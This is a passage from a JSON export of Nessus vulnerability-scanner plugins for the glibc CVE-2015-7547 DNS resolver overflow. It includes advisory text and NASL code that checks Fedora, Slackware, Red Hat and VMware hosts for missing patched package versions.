"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : glibc-2.22-9.fc23 (2016-0f9e9a34ce)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:glibc", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-0F9E9A34CE.NASL", "href": "https://www.tenable.com/plugins/nessus/89476", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-0f9e9a34ce.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89476);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"FEDORA\", value:\"2016-0f9e9a34ce\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Fedora 23 : glibc-2.22-9.fc23 (2016-0f9e9a34ce)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This updates addresses a critical security vulnerability in the DNS\nresolver related to `AF_UNSPEC` queries with `getaddrinfo`\n(CVE-2015-7547). In addition, a bug that causes Hesiod lookups to fail\nwith a crash is fixed.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1293532\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/177412.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f32ad04f\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"glibc-2.22-9.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:19:52", "description": "New glibc packages are available for Slackware 14.1 and -current to fix security issues.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-24T00:00:00", "type": "nessus", "title": "Slackware 14.1 / current : glibc (SSA:2016-054-02)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:glibc", "p-cpe:/a:slackware:slackware_linux:glibc-i18n", "p-cpe:/a:slackware:slackware_linux:glibc-profile", "p-cpe:/a:slackware:slackware_linux:glibc-solibs", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:14.1"], "id": "SLACKWARE_SSA_2016-054-02.NASL", "href": "https://www.tenable.com/plugins/nessus/88910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-054-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88910);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"SSA\", value:\"2016-054-02\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"Slackware 14.1 / current : glibc (SSA:2016-054-02)\");\n script_summary(english:\"Checks for updated packages in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New glibc packages are available for Slackware 14.1 and -current to\nfix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.569827\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5b214cba\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-i18n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:glibc-solibs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/24\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"i486\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.17\", pkgarch:\"x86_64\", pkgnum:\"11_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"glibc\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-i18n\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-profile\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", pkgname:\"glibc-solibs\", pkgver:\"2.23\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-i18n\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-profile\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"glibc-solibs\", pkgver:\"2.23\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:35", "description": "Updated rhev-hypervisor packages that fix one security issue are now available.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe rhev-hypervisor package provides a Red Hat Enterprise Virtualization Hypervisor ISO disk image. The Red Hat Enterprise Virtualization Hypervisor is a dedicated Kernel-based Virtual Machine (KVM) hypervisor. It includes everything necessary to run and manage virtual machines: A subset of the Red Hat Enterprise Linux operating environment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available for the Intel 64 and AMD64 architectures with virtualization extensions.\n\nA stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to upgrade to these updated packages.", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-23T00:00:00", "type": "nessus", "title": "RHEL 6 : rhev-hypervisor (RHSA-2016:0277)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6", "p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor7", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-0277.NASL", "href": "https://www.tenable.com/plugins/nessus/88889", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0277. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88889);\n script_version(\"2.17\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0277\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"RHEL 6 : rhev-hypervisor (RHSA-2016:0277)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated rhev-hypervisor packages that fix one security issue are now\navailable.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe rhev-hypervisor package provides a Red Hat Enterprise\nVirtualization Hypervisor ISO disk image. The Red Hat Enterprise\nVirtualization Hypervisor is a dedicated Kernel-based Virtual Machine\n(KVM) hypervisor. It includes everything necessary to run and manage\nvirtual machines: A subset of the Red Hat Enterprise Linux operating\nenvironment and the Red Hat Enterprise Virtualization Agent.\n\nNote: Red Hat Enterprise Virtualization Hypervisor is only available\nfor the Intel 64 and AMD64 architectures with virtualization\nextensions.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis issue was discovered by the Google Security Team and Red Hat.\n\nUsers of Red Hat Enterprise Virtualization Hypervisor are advised to\nupgrade to these updated packages.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/2161461\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0277\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected rhev-hypervisor6 and / or rhev-hypervisor7\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhev-hypervisor7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0277\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor6-6.7-20160104.2.el6ev\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rhev-hypervisor7-7.2-20160105.2.el6ev\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rhev-hypervisor6 / rhev-hypervisor7\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:20:35", "description": "a. glibc update for multiple products.\n\n The glibc library has been updated in multiple products to resolve a stack-based buffer overflow present in the glibc getaddrinfo function.\n The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the identifier CVE-2015-7547.\n\n VMware products have been grouped into the following four categories :\n I) ESXi and ESX Hypervisor Versions of ESXi and ESX prior to 5.5 are not affected because they do not ship with a vulnerable version of glibc.\n ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and are affected. See table 1 for remediation for ESXi 5.5 and ESXi 6.0.\n II) Windows-based products Windows-based products, including all versions of vCenter Server running on Windows, are not affected.\n\n III) VMware virtual appliances VMware virtual appliances ship with a vulnerable version of glibc and are affected. See table 2 for remediation for appliances.\n IV) Products that run on Linux VMware products that run on Linux (excluding virtual appliances) might use a vulnerable version of glibc as part of the base operating system. If the operating system has a vulnerable version of glibc, VMware recommends that customers contact their operating system vendor for resolution. WORKAROUND\n\n Workarounds are available for several virtual appliances. These are documented in VMware KB article 2144032.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for affected products in Table 1 and 2 below as these patches become available. In case patches are not available, customers are advised to deploy the workaround.\n\n Column 4 of the following tables lists the action required to remediate the vulnerability in each release, if a solution is available.\n\n Table 1 - ESXi ==============", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-25T00:00:00", "type": "nessus", "title": "VMSA-2016-0002 : VMware product updates address a critical glibc security vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7547"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:vmware:esxi:5.5", "cpe:/o:vmware:esxi:6.0"], "id": "VMWARE_VMSA-2016-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/88954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from VMware Security Advisory 2016-0002. \n# The text itself is copyright (C) VMware Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88954);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-7547\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"VMSA\", value:\"2016-0002\");\n\n script_name(english:\"VMSA-2016-0002 : VMware product updates address a critical glibc security vulnerability\");\n script_summary(english:\"Checks esxupdate output for the patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote VMware ESXi host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"a. glibc update for multiple products.\n\n The glibc library has been updated in multiple products to resolve \n a stack-based buffer overflow present in the glibc getaddrinfo function.\n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the identifier CVE-2015-7547.\n\n VMware products have been grouped into the following four\n categories :\n \n I) ESXi and ESX Hypervisor\n Versions of ESXi and ESX prior to 5.5 are not affected because\n they do not ship with a vulnerable version of glibc.\n ESXi 5.5 and ESXi 6.0 ship with a vulnerable version of glibc and\n are affected. \n See table 1 for remediation for ESXi 5.5 and ESXi 6.0.\n \n II) Windows-based products\n Windows-based products, including all versions of vCenter Server \n running on Windows, are not affected.\n\n III) VMware virtual appliances\n VMware virtual appliances ship with a vulnerable version of glibc\n and are affected. \n See table 2 for remediation for appliances.\n \n IV) Products that run on Linux\n VMware products that run on Linux (excluding virtual appliances)\n might use a vulnerable version of glibc as part of the base\n operating system. If the operating system has a vulnerable version\n of glibc, VMware recommends that customers contact their operating\n system vendor for resolution. \n \n WORKAROUND\n\n Workarounds are available for several virtual appliances. These are \n documented in VMware KB article 2144032.\n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected products in Table 1 and 2 below as these patches become\n available. In case patches are not available, customers are\n advised to deploy the workaround.\n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available.\n\n Table 1 - ESXi\n ==============\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.vmware.com/pipermail/security-announce/2016/000320.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply the missing patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:5.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2016-02-22\");\nflag = 0;\n\n\nif (esx_check(ver:\"ESXi 5.5\", vib:\"VMware:esx-base:5.5.0-3.84.3568722\")) flag++;\n\nif (esx_check(ver:\"ESXi 6.0\", vib:\"VMware:esx-base:6.0.0-1.29.3568940\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T20:19:51", "description": "A stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: this issue is only exposed when libresolv is called from the nss_dns NSS service module. (CVE-2015-7547)\n\nThis update also fixes the following bugs :\n\n - The dynamic loader has been enhanced to allow the loading of more shared libraries that make use of static thread local storage. While static thread local storage is the fastest access mechanism it may also prevent the shared library from being loaded at all since the static storage space is a limited and shared process-global resource. Applications which would previously fail with 'dlopen: cannot load any more object with static TLS' should now start up correctly.\n\n - A bug in the POSIX realtime support would cause asynchronous I/O or certain timer API calls to fail and return errors in the presence of large thread-local storage data that exceeded PTHREAD_STACK_MIN in size (generally 16 KiB). The bug in librt has been corrected and the impacted APIs no longer return errors when large thread-local storage data is present in the application.", "cvss3": {"score": 8.1, "vector": 